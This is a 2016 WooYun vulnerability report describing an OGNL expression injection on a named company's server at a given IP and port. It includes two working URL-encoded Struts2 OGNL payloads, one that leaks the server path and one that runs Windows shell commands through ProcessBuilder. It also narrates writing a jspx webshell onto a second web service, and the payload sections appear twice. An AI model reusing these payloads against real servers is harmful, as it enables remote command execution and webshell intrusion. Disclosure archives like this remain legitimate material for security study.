摘要 2016-06-15: 细节已通知厂商并且等待厂商处理中
2016-06-15: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-20: 厂商已经主动忽略漏洞,细节向公众公开
漏洞概要 关注数(47 ) 关注此漏洞
漏洞标题: 天天果园某平台表达式注入(已Getshell)
提交时间: 2016-06-15 06:49
公开时间: 2016-06-20 07:40
漏洞类型: 命令执行
危害等级: 高
自评Rank: 20
漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系
漏洞详情
披露状态:
2016-06-15: 细节已通知厂商并且等待厂商处理中 2016-06-15: 厂商已查看当前漏洞内容,细节仅向厂商公开 2016-06-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
"Some of us don't get to grow old with the one we love." — "I'll go old with her, Mr. Reese, just from afar."
某天,阳光明媚,乌云密布,睡了个午觉,梦见某ip存在表达式注入,醒来打开电脑,凭借零散的记忆,然后就Getshell了
详细说明:
http://180.167.72.216:89
发现了一个表达式注入
payload
code 区域
%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
爆出绝对路径
尝试写shell
然而failed,访问其他页面都需要登录
想啊想,不能就这样放弃了呀
nmap扫一下,发现88端口还有一个web服务
巧的是
如果关闭了弹窗的话会被重定向到一个帮助文件,这个是不需要登录的
于是在89端口的表达式注入那里
code 区域
%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'cmd','/c','dir e:/*.jsp /s'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println('~'%2B'~~2')%2C%23matt.getWriter().println(%23e)%2C%23matt.getWriter().println('2~'%2B'~~')%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D
找到了88端口的这个web服务的物理路径
写shell
直接jsp肯定是不行的,然而jspx
总的来说就是从A服务的命令执行写shell到B服务进行访问的故事
漏洞证明:
http://180.167.72.216:89
发现了一个表达式注入
payload
code 区域
%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
爆出绝对路径
尝试写shell
然而failed,访问其他页面都需要登录
想啊想,不能就这样放弃了呀
nmap扫一下,发现88端口还有一个web服务
巧的是
如果关闭了弹窗的话会被重定向到一个帮助文件,这个是不需要登录的
于是在89端口的表达式注入那里
code 区域
%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'cmd','/c','dir e:/*.jsp /s'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println('~'%2B'~~2')%2C%23matt.getWriter().println(%23e)%2C%23matt.getWriter().println('2~'%2B'~~')%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D
找到了88端口的这个web服务的物理路径
写shell
直接jsp肯定是不行的,然而jspx
总的来说就是从A服务的命令执行写shell到B服务进行访问的故事
修复方案:
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-06-20 07:40
厂商回复:
漏洞Rank:15 (WooYun评价)
最新状态:
暂无
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0 人评价) :
评价
2016-06-15 09:47 |
boooooom ( 普通白帽子 | Rank:486 漏洞数:53 | 我有一个好想法!)
0
2016-06-15 09:49 |
Ano_Tom ( 普通白帽子 | Rank:474 漏洞数:47 | Talk is cheap.:)
0
2016-06-15 10:34 |
荒废的腰子 ( 普通白帽子 | Rank:264 漏洞数:31 | bug is my best friend)
0
2016-06-15 10:38 |
李旭敏 ( 普通白帽子 | Rank:848 漏洞数:116 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)
0
2016-06-15 12:49 |
重瞳 ( 路人 | Rank:11 漏洞数:2 | 我是重瞳)
0
2016-06-15 14:31 |
CodeMan ( 路人 | Rank:6 漏洞数:5 | 湖北荆州公安的)
0
"Some of us don't get to grow old with the one we love." — "I'll go old with her, Mr. Reese, just from afar." 某天,阳光明媚,乌云密布,睡了个午觉,梦见某ip存在表达式注入,醒来打开电脑,凭借零散的记忆,然后就Getshell了
2016-06-16 10:49 |
A1opex ( 实习白帽子 | Rank:33 漏洞数:7 | 万物皆可print)
0
2016-06-20 08:23 |
U神 ( 核心白帽子 | Rank:1375 漏洞数:153 | 乌云核心菜鸟,此号长期由联盟托管,如果近...)
0
2016-06-20 14:37 |
血雨腥风 ( 路人 | Rank:4 漏洞数:4 | 乌云,我来了。)
0
免责声明: 文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
左青龙
微信扫一扫
右白虎
微信扫一扫
评论